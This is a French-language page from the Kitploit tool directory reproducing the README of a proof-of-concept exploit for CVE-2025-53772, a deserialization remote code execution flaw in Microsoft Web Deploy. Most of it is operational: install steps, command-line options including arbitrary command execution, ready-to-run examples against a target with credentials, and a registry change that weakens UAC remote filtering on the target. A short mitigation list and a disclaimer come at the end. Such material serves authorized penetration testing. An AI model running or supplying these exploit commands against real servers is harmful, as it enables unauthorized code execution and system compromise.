Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-53772 — PoC pour CVE-2025-53772 | Kitploit
Outils/GitHubGitHub/sailay1996/cve-2025-53772
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionApprentissage et ÉducationDéveloppement de Charges Utiles
GitHubsailay1996/cve-2025-53772

CVE-2025-53772

PoC pour CVE-2025-53772

Voir le dépôt
4611il y a 8 moisVérifié par Kitploit

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2025-53772 - Exploit RCE pour Microsoft Web Deploy

Un exploit basé sur Python pour CVE-2025-53772, une vulnérabilité d'exécution de code à distance dans Microsoft Web Deploy (msdeploy) causée par une désérialisation non sécurisée des données d'en-tête HTTP.

🎬 Vidéo POC

POC


Présentation de la vulnérabilité

PropriétéValeur
Identifiant CVECVE-2025-53772
Score CVSS8.8 (Élevé)
Produit concernéMicrosoft Web Deploy 4.0
Versions vulnérables< 10.0.2001
Version corrigée10.0.2001+
Type de vulnérabilitéDésérialisation de données non fiables (CWE-502)
AuthentificationRequise (privilèges faibles)

Fonctionnement

La vulnérabilité réside dans la désérialisation de l'en-tête HTTP MSDeploy.SyncOptions. Lorsqu'un payload spécialement conçu est envoyé, le serveur le désérialise à l'aide de BinaryFormatter, déclenchant l'exécution de code arbitraire via la chaîne de gadgets TypeConfuseDelegate.

root@kitploit:~
Attacker                                    Target Server
   │                                              │
   │  POST /MSDEPLOYAGENTSERVICE HTTP/1.1         │
   │  MSDeploy.SyncOptions: <malicious_payload>   │
   │─────────────────────────────────────────────>│
   │                                              │
   │                            BinaryFormatter.Deserialize()
   │                                     │
   │                                     ▼
   │                            Process.Start("cmd.exe", "/c ...")
   │                                     │
   │                                     ▼
   │                              RCE Achieved!

Points de terminaison concernés

Point de terminaisonPortProtocoleType d'authentification
/MSDEPLOYAGENTSERVICE80HTTPNTLM
/msdeploy.axd8172HTTPSBasic

Installation

root@kitploit:~
git clone https://github.com/sailay1996/CVE-2025-53772.git
cd CVE-2025-53772
pip install -r requirements.txt

Prérequis

root@kitploit:~
requests>=2.28.0
urllib3>=1.26.0
requests-ntlm>=1.2.0

Utilisation

Démarrage rapide

root@kitploit:~
# Create proof file in C:\Windows\Temp\pwned.txt
python3 CVE-2025-53772.py -t <TARGET_IP> -u "<DOMAIN\username>" -P "<password>" --ntlm --proof-temp

CVE-2025-53772.py

Options

root@kitploit:~
-t, --target      Target IP or hostname (required)
-u, --user        Username (required)
-P, --password    Password (required)
--port            Target port (default: 80)
--endpoint        Endpoint path (default: /MSDEPLOYAGENTSERVICE)
--ntlm            Use NTLM authentication (required for Agent Service)
--calc            Execute calc.exe
--proof-temp      Create C:\Windows\Temp\pwned.txt
--proof-web       Create C:\inetpub\wwwroot\pwned.txt
-c, --command     Custom command to execute
--generate-only   Only generate payload, don't send
-o, --output      Save payload to file

Exemples

Service Agent (Port 80 - Authentification NTLM)

root@kitploit:~
# Pop calculator
python3 CVE-2025-53772.py -t 192.168.1.100 -u "WORKSTATION\Administrator" -P "P@ssw0rd" --ntlm --calc

# Create proof file in temp folder
python3 CVE-2025-53772.py -t 192.168.1.100 -u "WORKSTATION\webdeploy" -P "Password123" --ntlm --proof-temp

# Create proof file in webroot (verify via browser)
python3 CVE-2025-53772.py -t 192.168.1.100 -u "WORKSTATION\admin" -P "Password123" --ntlm --proof-web

# Execute custom command
python3 CVE-2025-53772.py -t 192.168.1.100 -u "WORKSTATION\admin" -P "Password123" --ntlm -c "whoami > C:\Windows\Temp\whoami.txt"

# Generate payload only (don't send)
python3 CVE-2025-53772.py -t 192.168.1.100 -u "test" -P "test" --generate-only --proof-temp -o payload.txt

Service WMSvc (Port 8172 - Authentification de base)

root@kitploit:~
# Using msdeploy.axd endpoint (no --ntlm flag)
python3 CVE-2025-53772.py -t 192.168.1.100 -u "webdeploy" -P "Password123" --port 8172 --endpoint "/msdeploy.axd" --proof-temp

Vérification

Après avoir exécuté l'exploit, vérifiez son exécution sur la cible :

root@kitploit:~
# Check for proof file
type C:\Windows\Temp\pwned.txt

# Or via browser (if --proof-web was used)
# Navigate to: http://<TARGET>/pwned.txt

Problèmes courants

401 Non autorisé (NTLM)

Si vous utilisez le service Agent avec NTLM et obtenez une erreur 401 :

root@kitploit:~
# On target, disable UAC remote filtering:
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f

404 Introuvable (msdeploy.axd)

Le gestionnaire IIS n'est peut-être pas enregistré. Utilisez plutôt le point de terminaison du service Agent :

root@kitploit:~
--port 80 --endpoint "/MSDEPLOYAGENTSERVICE"

Vérifier la version vulnérable

root@kitploit:~
# Check installed version
(Get-Command msdeploy.exe).FileVersionInfo.FileVersion
# Vulnerable if < 10.0.2001

Atténuation

  1. Mettez à jour Web Deploy vers la version 10.0.2001 ou ultérieure
  2. Restreignez l'accès aux points de terminaison Web Deploy via le pare-feu
  3. Utilisez des identifiants forts et évitez la réutilisation des mots de passe
  4. Surveillez les journaux pour toute activité suspecte sur les ports 80/8172
  5. Désactivez Web Deploy si vous n'en avez pas besoin

Références

  • Avis de sécurité Microsoft
  • NVD - CVE-2025-53772
  • Recherche originale par HawkTrace

Avertissement

Cet outil est fourni uniquement à des fins de tests de sécurité autorisés et d'éducation. L'accès non autorisé à des systèmes informatiques est illégal. Obtenez toujours une autorisation appropriée avant de tester.


Licence

Licence MIT

Télécharger l’outil